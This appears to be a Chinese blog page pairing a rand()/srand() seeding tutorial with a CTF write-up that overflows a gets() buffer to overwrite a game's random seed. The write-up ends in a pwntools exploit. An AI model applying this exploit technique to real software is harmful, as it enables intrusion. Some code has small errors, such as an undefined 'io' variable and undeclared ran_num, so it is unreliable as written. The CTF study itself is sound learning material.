Posted on | In

函数的作用

1
2
3
4
5
6
7
8
9
void srand(unsigned seed);//srand函数是随机数发生器的初始化函数
int rand(void)//rand函数用来产生随机数,当然是伪随机数

seed的作用: srand函数的作用是根据参数seed,设置一个随机起始点,而rand函数根据这个起始点,产生随机数序列。默认的随机种子为1.如果随机种子一样,rand函数所产生的随机序列也一样。因此,为使每次程序运行都能产生不同的随机序列,每次都应产生一个不同的种子参数。

因为rand的内部实现是用线性同余法做的,它不是真的随机数,只不过是因为其周期特别长,所以有一定的范围里可看成是随机的,rand()会返回一随机数值,范围在0至RAND_MAX间。在调用此函数产生随机数前,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。rand()产生的是假随机数字,每次执行时是相同的。若要不同,以不同的值来初始化它.初始化的函数就是srand()。

返回值
返回0至RAND_MAX之间的随机整数值,RAND_MAX的范围最少是在32767之间(int),即双字节(16位数)。若用unsigned int 双字节是65535,四字节是4294967295的整数范围。

例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
//取得0~6之间的随机整数  

#include <iostream>  

int main()  

{  

    for(int i=0;i<10;i++)  

    {   

        ran_num=rand()%6;  

        cout<<ran_num<<" ";  

    }  

    return 0;  

}  

//由于种子默认都是1,故每次运行都将输出:5 5 4 4 5 4 0 0 4 2

//将seed指定为6的话

#include <iostream>  

int main()  

{  

    srand(6);  

    for(int i=0;i<10;i++)  

    {   

        ran_num=rand()%6;  

        cout<<ran_num<<" ";  

    }  

    return 0;  

}  

//每次运行都将输出:每次运行都将输出:4 1 5 1 4 3 4 4 2 2

举例4:那么我们如何产生一个伪随机的种子呢?一般指定seed为当前系统流逝了的时间(单位为秒):time_t time(0):

//取得0~6之间的随机整数  

#include <iostream>  

#include <ctime>//时间函数  

int main()  

{  

    srand((unsigned)time(0));  

    for(int i=0;i<10;i++)  

    {   

        ran_num=rand()%6;  

        cout<<ran_num<<" ";  

    }  

    return 0;  

}  

       第一次运行时输出:0 1 5 4 5 0 2 3 4 2

       第二次:3 2 3 0 3 5 5 2 2 3

       总之,每次运行结果将不一样,因为每次启动程序的时刻都不同

原文:https://blog.csdn.net/lianghui0811/article/details/76480664

关于time_t time(0)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
time_t被定义为长整型,它返回从1970年1月1日零时零分零秒到目前为止所经过的时间,单位为秒。比如假设输出:

       cout<<time(0);

      值约为1169174701,约等于37(年)乘365(天)乘24(小时)乘3600(秒)(月日没算)。

      另外,关于ran_num = rand() % 6,将rand()的返回值与6求模是必须的,这样才能确保目的随机数落在[0,6)之间,否则rand()的返回值本身可能是很巨大的。

      一个通用的公式是:

      要取得[a,b)之间的随机整数,使用(rand() % (b-a))+ a(结果值将含a不含b)。在a为0的情况下,简写为rand() % b。

      另外还有一种比较常用的产生随机种子的函数:

       srand(time(NULL)); //是以当前时间为种子,产生随意数。其中,time(NULL)用来获取当前时间,本质上得到的是一个大整数,然后用这个数来随机数。

Posted on | In

0x01 寻找漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
xfgg@ubuntu:~/Downloads$ checksec guess_num
[*] '/home/xfgg/Downloads/guess_num'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

ida分析

_int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+4h] [rbp-3Ch]
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7; // [rsp+10h] [rbp-30h]
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:", 0LL);
  gets((__int64)&v7);
  srand(seed[0]);
  for ( i = 0; i <= 9; ++i )
  {
    v6 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}

sub_c3e中有system("cat flag");

0x02 思路分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
-0000000000000030 var_30          db ?
-000000000000002F                 db ? ; undefined
-000000000000002E                 db ? ; undefined
-000000000000002D                 db ? ; undefined
-000000000000002C                 db ? ; undefined
-000000000000002B                 db ? ; undefined
-000000000000002A                 db ? ; undefined
-0000000000000029                 db ? ; undefined
-0000000000000028                 db ? ; undefined
-0000000000000027                 db ? ; undefined
-0000000000000026                 db ? ; undefined
-0000000000000025                 db ? ; undefined
-0000000000000024                 db ? ; undefined
-0000000000000023                 db ? ; undefined
-0000000000000022                 db ? ; undefined
-0000000000000021                 db ? ; undefined
-0000000000000020                 db ? ; undefined
-000000000000001F                 db ? ; undefined
-000000000000001E                 db ? ; undefined
-000000000000001D                 db ? ; undefined
-000000000000001C                 db ? ; undefined
-000000000000001B                 db ? ; undefined
-000000000000001A                 db ? ; undefined
-0000000000000019                 db ? ; undefined
-0000000000000018                 db ? ; undefined
-0000000000000017                 db ? ; undefined
-0000000000000016                 db ? ; undefined
-0000000000000015                 db ? ; undefined
-0000000000000014                 db ? ; undefined
-0000000000000013                 db ? ; undefined
-0000000000000012                 db ? ; undefined
-0000000000000011                 db ? ; undefined
-0000000000000010 seed            dd 2 dup(?)

发现var_30在栈中占0x20,可以覆盖到seed
如果使输入的guessnumber,即v4等于随机数v6,即可cat flag。

0x03攻击

1
2
3
关于rand和srand
随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。在调用rand()函数时,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。
对于该题目,我们将随机种子设置为0或1都可,参考文件中的循环来写脚本。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from ctypes import *

p = process("/home/xfgg/Downloads/guess_num")

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
io.recvuntil('your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)

io.interactive()
0%